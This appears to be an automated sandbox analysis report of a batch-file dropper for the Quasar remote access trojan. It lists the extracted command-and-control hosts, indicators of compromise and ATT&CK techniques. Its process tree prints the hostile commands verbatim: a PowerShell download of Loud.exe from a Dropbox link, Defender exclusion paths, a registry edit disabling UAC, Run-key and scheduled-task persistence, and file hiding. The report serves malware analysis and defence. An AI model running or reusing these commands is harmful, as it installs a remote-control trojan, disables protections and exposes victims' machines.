quasar | a599fcae8f2c31fb4bf0fe02b30e4ee4bd23d599c6c3d9a571df508a470d690d

Analysis

max time kernel
144s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2024 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

noloud.bat
Size

12KB
MD5

e435591eabd5596e754a7acaede7dca7
SHA1

2b1b728aae5d3e72fe4bc864559d0347489f995a
SHA256

a599fcae8f2c31fb4bf0fe02b30e4ee4bd23d599c6c3d9a571df508a470d690d
SHA512

3248a7cf8542068c126906b9db5e3fb0dde7ca123b7cf3f5375aad6b5c65bb909db5e3b5e127104e664b57eea4774d5283228533f01beb45b50ccdd3545e8f69
SSDEEP

384:gTYcpQyuPmhDGEhtKCR2XYmE2JdAp6EbW263JM3jXMIccK:gTYcpQyuPmhDGEhtKCReU2JdjES3JQj4

Score

10^/10

quasar undercontrol discovery evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

UnderControl

google-15-node.giize.com:9876

192.168.0.192:9876

127.0.0.1:9876

SeraiBawang-61025.portmap.io::61025

Mutex

BlackMaster: UnderControl

Attributes

encryption_key
070CDBCBB8132B62B93E1CB06630D9221F0FFA4A
install_name
MicrosoftAI.exe
log_directory
USSR
reconnect_delay
2000
startup_key
Microsoft Private Ai
subdirectory
Microsoft

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\PP2\Loud.exe	family_quasar
behavioral2/memory/3216-80-0x0000000000860000-0x0000000000B94000-memory.dmp	family_quasar

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

14 3996 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3996 powershell.exe
2932 powershell.exe
4128 powershell.exe
1280 powershell.exe
3728 powershell.exe
3204 powershell.exe
Downloads MZ/PE file

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

flow	pid	process
14	3996	powershell.exe

pid	process
3996	powershell.exe
2932	powershell.exe
4128	powershell.exe
1280	powershell.exe
3728	powershell.exe
3204	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MicrosoftAI.exeMicrosoftAI.exeMicrosoftAI.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	MicrosoftAI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	MicrosoftAI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	MicrosoftAI.exe

Executes dropped EXE 5 IoCs

Processes:

Loud.exeMicrosoftAI.exeMicrosoftAI.exeMicrosoftAI.exeMicrosoftAI.exe

pid process

3216 Loud.exe
4912 MicrosoftAI.exe
4356 MicrosoftAI.exe
5108 MicrosoftAI.exe
1844 MicrosoftAI.exe

pid	process
3216	Loud.exe
4912	MicrosoftAI.exe
4356	MicrosoftAI.exe
5108	MicrosoftAI.exe
1844	MicrosoftAI.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\MicrosoftAI.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\MicrosoftAI.exe"	reg.exe

Drops file in Program Files directory 11 IoCs

Processes:

MicrosoftAI.exeLoud.exeMicrosoftAI.exeMicrosoftAI.exeMicrosoftAI.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft\MicrosoftAI.exe	MicrosoftAI.exe
File opened for modification	C:\Program Files\Microsoft	MicrosoftAI.exe
File created	C:\Program Files\Microsoft\MicrosoftAI.exe	Loud.exe
File opened for modification	C:\Program Files\Microsoft\MicrosoftAI.exe	Loud.exe
File opened for modification	C:\Program Files\Microsoft	MicrosoftAI.exe
File opened for modification	C:\Program Files\Microsoft\MicrosoftAI.exe	MicrosoftAI.exe
File opened for modification	C:\Program Files\Microsoft	MicrosoftAI.exe
File opened for modification	C:\Program Files\Microsoft	MicrosoftAI.exe
File opened for modification	C:\Program Files\Microsoft	Loud.exe
File opened for modification	C:\Program Files\Microsoft\MicrosoftAI.exe	MicrosoftAI.exe
File opened for modification	C:\Program Files\Microsoft\MicrosoftAI.exe	MicrosoftAI.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXEPING.EXEPING.EXE

pid process

1436 PING.EXE
3216 PING.EXE
4992 PING.EXE
Modifies registry key 1 TTPs 7 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1600 reg.exe
3596 reg.exe
3264 reg.exe
4568 reg.exe
2592 reg.exe
5000 reg.exe
4668 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

4992 PING.EXE
1436 PING.EXE
3216 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

264 schtasks.exe
2124 schtasks.exe
4024 schtasks.exe
2708 schtasks.exe
836 schtasks.exe

pid	process
1436	PING.EXE
3216	PING.EXE
4992	PING.EXE

pid	process
1600	reg.exe
3596	reg.exe
3264	reg.exe
4568	reg.exe
2592	reg.exe
5000	reg.exe
4668	reg.exe

pid	process
4992	PING.EXE
1436	PING.EXE
3216	PING.EXE

pid	process
264	schtasks.exe
2124	schtasks.exe
4024	schtasks.exe
2708	schtasks.exe
836	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4128	powershell.exe
4128	powershell.exe
1280	powershell.exe
1280	powershell.exe
3728	powershell.exe
3728	powershell.exe
3204	powershell.exe
3204	powershell.exe
3996	powershell.exe
3996	powershell.exe
2932	powershell.exe
2932	powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeLoud.exeMicrosoftAI.exeMicrosoftAI.exeMicrosoftAI.exeMicrosoftAI.exe

description	pid	process
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	3216	Loud.exe
Token: SeDebugPrivilege	4912	MicrosoftAI.exe
Token: SeDebugPrivilege	4356	MicrosoftAI.exe
Token: SeDebugPrivilege	5108	MicrosoftAI.exe
Token: SeDebugPrivilege	1844	MicrosoftAI.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

MicrosoftAI.exeMicrosoftAI.exeMicrosoftAI.exeMicrosoftAI.exe

pid process

4912 MicrosoftAI.exe
4356 MicrosoftAI.exe
5108 MicrosoftAI.exe
1844 MicrosoftAI.exe

pid	process
4912	MicrosoftAI.exe
4356	MicrosoftAI.exe
5108	MicrosoftAI.exe
1844	MicrosoftAI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exeLoud.exeMicrosoftAI.execmd.exeMicrosoftAI.execmd.exeMicrosoftAI.exe

description	pid	process	target process
PID 3084 wrote to memory of 2836	3084	cmd.exe	net.exe
PID 3084 wrote to memory of 2836	3084	cmd.exe	net.exe
PID 2836 wrote to memory of 2032	2836	net.exe	net1.exe
PID 2836 wrote to memory of 2032	2836	net.exe	net1.exe
PID 3084 wrote to memory of 4128	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 4128	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 1280	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 1280	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 3728	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 3728	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 3204	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 3204	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 320	3084	cmd.exe	attrib.exe
PID 3084 wrote to memory of 320	3084	cmd.exe	attrib.exe
PID 3084 wrote to memory of 3996	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 3996	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 2932	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 2932	3084	cmd.exe	powershell.exe
PID 3084 wrote to memory of 3596	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 3596	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 3216	3084	cmd.exe	Loud.exe
PID 3084 wrote to memory of 3216	3084	cmd.exe	Loud.exe
PID 3084 wrote to memory of 3272	3084	cmd.exe	attrib.exe
PID 3084 wrote to memory of 3272	3084	cmd.exe	attrib.exe
PID 3084 wrote to memory of 3888	3084	cmd.exe	attrib.exe
PID 3084 wrote to memory of 3888	3084	cmd.exe	attrib.exe
PID 3084 wrote to memory of 3264	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 3264	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 4568	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 4568	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 5000	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 5000	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 2592	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 2592	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 4668	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 4668	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 1600	3084	cmd.exe	reg.exe
PID 3084 wrote to memory of 1600	3084	cmd.exe	reg.exe
PID 3216 wrote to memory of 2124	3216	Loud.exe	schtasks.exe
PID 3216 wrote to memory of 2124	3216	Loud.exe	schtasks.exe
PID 3216 wrote to memory of 4912	3216	Loud.exe	MicrosoftAI.exe
PID 3216 wrote to memory of 4912	3216	Loud.exe	MicrosoftAI.exe
PID 4912 wrote to memory of 4024	4912	MicrosoftAI.exe	schtasks.exe
PID 4912 wrote to memory of 4024	4912	MicrosoftAI.exe	schtasks.exe
PID 4912 wrote to memory of 732	4912	MicrosoftAI.exe	cmd.exe
PID 4912 wrote to memory of 732	4912	MicrosoftAI.exe	cmd.exe
PID 732 wrote to memory of 952	732	cmd.exe	chcp.com
PID 732 wrote to memory of 952	732	cmd.exe	chcp.com
PID 732 wrote to memory of 4992	732	cmd.exe	PING.EXE
PID 732 wrote to memory of 4992	732	cmd.exe	PING.EXE
PID 732 wrote to memory of 4356	732	cmd.exe	MicrosoftAI.exe
PID 732 wrote to memory of 4356	732	cmd.exe	MicrosoftAI.exe
PID 4356 wrote to memory of 2708	4356	MicrosoftAI.exe	schtasks.exe
PID 4356 wrote to memory of 2708	4356	MicrosoftAI.exe	schtasks.exe
PID 4356 wrote to memory of 3012	4356	MicrosoftAI.exe	cmd.exe
PID 4356 wrote to memory of 3012	4356	MicrosoftAI.exe	cmd.exe
PID 3012 wrote to memory of 4948	3012	cmd.exe	chcp.com
PID 3012 wrote to memory of 4948	3012	cmd.exe	chcp.com
PID 3012 wrote to memory of 1436	3012	cmd.exe	PING.EXE
PID 3012 wrote to memory of 1436	3012	cmd.exe	PING.EXE
PID 3012 wrote to memory of 5108	3012	cmd.exe	MicrosoftAI.exe
PID 3012 wrote to memory of 5108	3012	cmd.exe	MicrosoftAI.exe
PID 5108 wrote to memory of 836	5108	MicrosoftAI.exe	schtasks.exe
PID 5108 wrote to memory of 836	5108	MicrosoftAI.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

320 attrib.exe
3272 attrib.exe
3888 attrib.exe

pid	process
320	attrib.exe
3272	attrib.exe
3888	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\noloud.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3084
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3204
- C:\Windows\system32\attrib.exe
  attrib +h "PP2" /s/d
  2⤵
  - Views/modifies file attributes
  PID:320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://dl.dropboxusercontent.com/scl/fi/vmi505vr2w31tjb6b37ga/Loud.exe?rlkey=i5ewl9aw5z57ot2lpfi0n74y2&st=wufvc8k3&dl=0' -OutFile Loud.exe"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-WebrequestWindows_NT 'https://dl.dropboxusercontent.com/scl/fi/vmi505vr2w31tjb6b37ga/Loud.exe?rlkey=i5ewl9aw5z57ot2lpfi0n74y2&st=wufvc8k3&dl=0' -OutFile Loud.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2932
- C:\Windows\system32\reg.exe
  reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:3596
- C:\Users\Admin\AppData\Local\PP2\Loud.exe
  Loud.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3216
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Microsoft Private Ai" /sc ONLOGON /tr "C:\Program Files\Microsoft\MicrosoftAI.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2124
- - C:\Program Files\Microsoft\MicrosoftAI.exe
    "C:\Program Files\Microsoft\MicrosoftAI.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Microsoft Private Ai" /sc ONLOGON /tr "C:\Program Files\Microsoft\MicrosoftAI.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ul2XEfdJzM4C.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:732
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:952
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4992
    - - C:\Program Files\Microsoft\MicrosoftAI.exe
        
        "C:\Program Files\Microsoft\MicrosoftAI.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4356
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Microsoft Private Ai" /sc ONLOGON /tr "C:\Program Files\Microsoft\MicrosoftAI.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2708
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nYDHMdu8HH11.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3012
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4948
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1436
        
        C:\Program Files\Microsoft\MicrosoftAI.exe
        
        "C:\Program Files\Microsoft\MicrosoftAI.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5108
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Microsoft Private Ai" /sc ONLOGON /tr "C:\Program Files\Microsoft\MicrosoftAI.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l8cE2aIOv48t.bat" "
        8⤵
        
        PID:3456
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:1336
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3216
        
        C:\Program Files\Microsoft\MicrosoftAI.exe
        
        "C:\Program Files\Microsoft\MicrosoftAI.exe"
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1844
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Microsoft Private Ai" /sc ONLOGON /tr "C:\Program Files\Microsoft\MicrosoftAI.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:264
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:3272
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:3888
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:3264
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:4568
- C:\Windows\system32\reg.exe
  reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\MicrosoftAI.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:5000
- C:\Windows\system32\reg.exe
  reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\MicrosoftAI.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:2592
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:4668
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftAI.exe.log

Filesize
2KB

MD5
8f0271a63446aef01cf2bfc7b7c7976b

SHA1
b70dad968e1dda14b55ad361b7fd4ef9ab6c06d7

SHA256
da740d78ae00b72cb3710d1a1256dc6431550965d20afaa65e5d5860a4748e8c

SHA512
78a403c69f1284b7dd41527019f3eede3512a5e4d439d846eca83557b741ca37bcf56c412f3e577b9dd4cfa5a6d6210961215f14cb271b143f6eb94f69389cf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef647504cf229a16d02de14a16241b90

SHA1
81480caca469857eb93c75d494828b81e124fda0

SHA256
47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

SHA512
a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5506f5f39ffe77cb5d806aac1ecae9bf

SHA1
8202d5ddd51e91aacd93074d36b55869bbfff8c7

SHA256
4d1cc342afc2716022d7fe5f89483d6d141ba79d413d27346073efccd0be4526

SHA512
dd3bcdb3acf914a278b1216e7c0db38bf57221448ebb5e772542d4ca58d2bb6043c7f7e121d27ce2dbc78f55a6e9fd38fce69846f99a87104d31bd2cd1aed92e

Download Submit
C:\Users\Admin\AppData\Local\PP2\Loud.exe

Filesize
3.2MB

MD5
6d1f4fba2ad8d1b040083dd917b410e5

SHA1
15e0de4f7e6802bde55813630e681bc524667d0e

SHA256
66435c8a630d0dcbdee3ed4c39435a6624df9f565a379a8df6c987e774f40437

SHA512
a29e1a7fe24a3183606eb9bebafe7a42444e5f6336361247f551dfef4b9843be66eaab57e40242dc10c5dc9f9cbbbd163def3dbb97270114c3e504fc5f3d91b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ik4lhs0y.w0o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\l8cE2aIOv48t.bat

Filesize
201B

MD5
c1fb0f02367c8c90e2b8de71ed787ce9

SHA1
3b351da73254713c66fe5880c0f2e83cb9c63746

SHA256
8039dae18c755f98fc70a7c94127f339fe5b6671ec4cd66b9e31f1c68159881c

SHA512
57c9ab251be1723f84a99b2f4b1a560e9cf349eb1e05666d248d4ba1a53714747a6482351e272abbc95716f0175888569302e476f9532931afd37a6890a7ab24

Download Submit
C:\Users\Admin\AppData\Local\Temp\nYDHMdu8HH11.bat

Filesize
201B

MD5
1b7006b784e4bea6217c84d227503f8d

SHA1
91aac551afb8346d753626602dafdbe999db47cd

SHA256
d5384752b655e29c227120ace9a18206c6382d75a8f215235b7bff5f8af7af07

SHA512
